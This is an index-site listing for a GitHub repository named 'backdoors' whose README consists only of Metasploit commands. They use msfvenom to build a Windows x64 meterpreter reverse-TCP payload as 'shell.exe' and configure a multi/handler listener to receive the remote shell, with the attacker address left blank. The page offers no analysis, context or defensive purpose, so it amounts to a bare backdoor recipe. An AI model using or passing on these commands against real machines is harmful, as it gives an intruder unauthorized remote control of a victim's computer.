An open API service indexing awesome lists of open source software.

https://github.com/surcodev/backdoors


https://github.com/surcodev/backdoors

Last synced: 3 months ago
JSON representation

Awesome Lists containing this project

README

        

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe shell.exe

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost
set lport
show options
run
```